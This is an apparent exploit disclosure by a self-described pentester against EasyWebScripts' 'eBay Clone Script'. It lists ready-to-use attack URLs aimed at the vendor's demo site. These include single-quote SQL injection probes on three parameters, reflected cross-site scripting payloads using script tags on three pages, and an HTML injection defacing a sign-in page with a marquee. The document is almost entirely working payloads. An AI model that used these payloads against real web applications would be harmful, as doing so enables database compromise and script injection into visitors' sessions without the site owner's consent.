##################################################################################
       __            _                      _            ____            
      / /___ _____  (_)_____________ ______(_)__  _____ / __ \_________ _
 __  / / __ `/ __ \/ / ___/ ___/ __ `/ ___/ / _ \/ ___// / / / ___/ __ `/
/ /_/ / /_/ / / / / (__  |__  ) /_/ / /  / /  __(__  )/ /_/ / /  / /_/ / 
\____/\__,_/_/ /_/_/____/____/\__,_/_/  /_/\___/____(_)____/_/   \__, /  
                                                                /____/   
##################################################################################                                
EasyWebScripts eBay Clone Script, Multiple Vulnerabilities
Software Page: http://easywebscripts.com/product_details.php?item_id=10
Script Demo: http://easywebscripts.com/ebay

Author(Pentester): 3spi0n
On Social: Twitter.Com/eyyamgudeer
Greetz: Grayhatz Inc. and Janissaries Platform.
##################################################################################

[1] MySQL Injection on Script

[+] (gallery.php, cid Param)
>>> http://easywebscripts.com/ebay/gallery.php?cid=1' (MySQLi Found)

[+] (product_desc.php, id Param)
>>> http://easywebscripts.com/ebay/product_desc.php?id=1' (MySQLi Found)

[+] (showcategory.php, cid Param)
>>> http://easywebscripts.com/ebay/showcategory.php?cid=536' (MySQLi Found)

[2] Cross Site Scripting (XSS) on Script

[+] (lostpassword.php, msg Param)
>>> http://easywebscripts.com//ebay/lostpassword.php?msg='"()%26%251<script>prompt(99456454)</script>

[+] (showcategory.php, pg Param)
>>> http://easywebscripts.com//ebay/showcategory.php?cid=0&pg='"()%26%251<script>prompt(54648451)</script>&type=6

[+] (signinform.php, msg Param)
>>> http://easywebscripts.com/ebay/signinform.php?msg='"()%26%251<script>prompt(54648451)</script>

[3] CRLF injection/HTTP response splitting on Script

[+] (signinform.php, msg Param)
>>> http://easywebscripts.com//ebay/signinform.php?msg=<h1><marquee>Inj3ct3d by 3spi0n</marquee></h1>